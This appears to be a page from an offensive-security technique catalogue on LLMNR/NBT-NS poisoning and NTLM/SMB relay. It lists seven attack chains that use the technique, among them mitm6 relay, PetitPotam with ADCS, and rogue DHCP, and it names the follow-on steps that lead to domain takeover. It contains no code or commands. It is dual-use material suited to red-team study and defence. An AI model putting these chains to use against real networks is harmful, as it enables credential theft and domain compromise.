LLMNR/NBT-NS Poisoning and SMB Relay
Spoof name resolution to coerce victims to authenticate, then relay or crack the captured NetNTLMv2.
§ Where this technique fits
T1557.001 is catalogued under the Credential Access tactic of the offensive-security kill-chain. It appears in 7 approved dossiers in the registry, typically at step 3.3 on average.
Authoritative reference: attack.mitre.org/techniques/T1557/001/.
§ Dossiers chaining this technique
- step 2 / 4
WSUS over HTTP → push code to managed clients
Clients using an HTTP WSUS server can be MITM'd to receive an attacker-signed (but Microsoft-trusted) auxiliary update that executes arbitrary commands as SYSTEM.
- step 2 / 8
No creds → Domain Admin via LLMNR poisoning and NTLM relay
Unauthenticated attacker on the LAN poisons name resolution, relays the captured NetNTLMv2 to a host with SMB signing disabled, then escalates to Domain Admin.
- step 2 / 6
PetitPotam + ADCS ESC8 → Domain Controller takeover
Coerce a DC's machine account to authenticate to the attacker, relay that NTLM to the ADCS HTTP web-enrollment endpoint, and obtain a DC certificate for full domain compromise.
- step 3 / 7
SCCM site takeover via NTLM relay (Takeover-1)
Coerce the SCCM site server to authenticate, relay to MSSQL on the site database, and grant yourself Full Administrator inside SCCM.
- step 4 / 7
mitm6 IPv6 SLAAC → NTLM relay → DA
Even when IPv4 is hardened, Windows clients prefer IPv6 with default DHCPv6. mitm6 makes the attacker the IPv6 DNS server, advertises wpad, and relays the captured NTLM to LDAPS for RBCD.
- step 4 / 5
Rogue DHCP → DNS poisoning → MITM
Bring up a faster DHCP server on the segment; new clients get attacker as gateway + DNS — strip HTTPS, capture creds, inject payloads.
- step 6 / 6
802.1X NAC bypass via printer MAC spoof
Plug into the LAN, sniff a printer / IP-phone MAC, clone it on your laptop, get full LAN access via MAC-Auth-Bypass — bypass NAC entirely.
§ What commonly comes next
- 01Authentication Coercionseen 1×AD-COERCE · Initial Access
- 02Brute Forceseen 1×T1110 · Credential Access
- 03Resource-Based Constrained Delegation (RBCD) Abuseseen 1×AD-RBCD · Lateral Movement
- 04SCCM Client Push Installation Abuseseen 1×AD-SCCM-CLIENTPUSH · Privilege Escalation
- 05SMB/Windows Admin Sharesseen 1×T1021.002 · Lateral Movement
- 06WSUS Update Injection (HTTP)seen 1×AD-WSUS · Privilege Escalation